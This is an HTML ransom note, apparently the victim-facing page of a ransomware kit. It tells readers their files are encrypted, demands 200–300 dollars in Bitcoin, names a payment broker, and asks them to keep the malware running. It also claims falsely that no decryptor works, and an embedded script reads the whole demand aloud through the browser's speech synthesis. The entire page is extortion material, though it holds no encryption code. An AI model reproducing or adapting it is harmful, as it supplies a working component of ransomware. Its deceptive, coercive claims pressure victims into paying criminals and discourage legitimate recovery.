<!DOCTYPE html><html><body><center><h3>What happened to my files?</h3><p>Your files are encrypted with strong, military-grade encryption. In order to recover them you must pay a fee. This fee is not very large and can range from 200-300$. Failure to pay the fee will result in the loss of your files. There is no deadline for when you can pay.<h3>How can I trust you?</h3><p>Your files will be recovered immediately after our service detects that you have paid. In order to allow this, please allow our program to continue running so that it can retrieve your files. We can help and provide assistance in chat to those who need it. (NOTE: We do not respond to requests to lower the fee.)<h3>How can I pay?</h3><p>We only accept a form of digital currency known as Bitcoin. There are many guides on how to buy this online, which you can find from googling. If you want to buy bitcoin using paypal, giftcard, and other forms of payment, then http://www.paxful.com is a great and easy way. </p><h3>Where is my CONTACTID?</h3><p>Your CONTACTID should be written on your background or located in the file: READ_ME.txt which can be found on your desktop. Please retrieve it as this is necesary for payment in order to retrieve your files. This may require checking to see if your antivirus has deleted this file. If it has please recover it. Without this file, there is no hope to retriving your files. It is a good idea to store your contactid in a safe spot until your files are retrieved.</p><h3>I have paid, how long will it take?</h3><p>Once you pay, it depends on how long it takes for the transaction to verify. This can be 1 minute - 1 day. <h3>How do I remove this program once I have retrieved my files?</h3><p>The program will remove itself from your computer. You are welcome to try an antivirus or any other program to confirm our claim.</p><h3>Is there any program or any other way to recover my files?</h3><p>There is no possible way to recover your files without paying us. Any attempt to use any decryptors/tools may permanently damage your files!</p></center><script type='text/javascript'>
var edge = /Edge/.test(navigator.userAgent);
var firefox = /Firefox/.test(navigator.userAgent);
var chrome = /Google Inc/.test(navigator.vendor);
var ie = /Trident/.test(navigator.userAgent);
var opera = /OPR/.test(navigator.userAgent);
if(ie){

}
else if(firefox || chrome || opera || edge){
var msg = new SpeechSynthesisUtterance('WHAT HAPPENED TO MY FILES? Your files are encrypted with strong, military-grade encryption. In order to recover them you must pay a fee. This fee is not very large and can range from two hundred to three hundred united states dollars. Failure to pay the fee will result in the loss of your files. There is no deadline for when you can pay.  HOW CAN YOU TRUST US? You can trust us because your files will be recovered immediately after our service detects that you have paid. In order to allow this, please allow our program to continue running so that it can retrieve your files. We can help and provide assistance in chat to those who need it. NOTE, We do not respond to requests to lower the fee. SO HOW CAN YOU PAY? We only accept a form of digital currency known as Bitcoin. There are many guides on how to buy this online, which you can find from googling. If you want to buy bitcoin using paypal, giftcard, and other forms of payment, then using the website paxful dot com is a great and easy way. I HAVE PAID, HOW LONG WILL IT TAKE? Once you pay, it depends on how long it takes for the transaction to verify. This can be 1 minute - 1 day. HOW DO I REMOVE THIS PROGRAM ONCE I HAVE RETRIEVED MY FILES? The program will remove itself from your computer. You are welcome to try an antivirus or any other program to confirm our claim. IS THERE ANY PROGRAM OR ANY OTHER WAY TO RECOVER MY FILES? There is no possible way to recover your files without paying. Anyone offering a way to decrypt is clearly scamming you.');
window.speechSynthesis.speak(msg);
}
 </script>

</body>
</html>
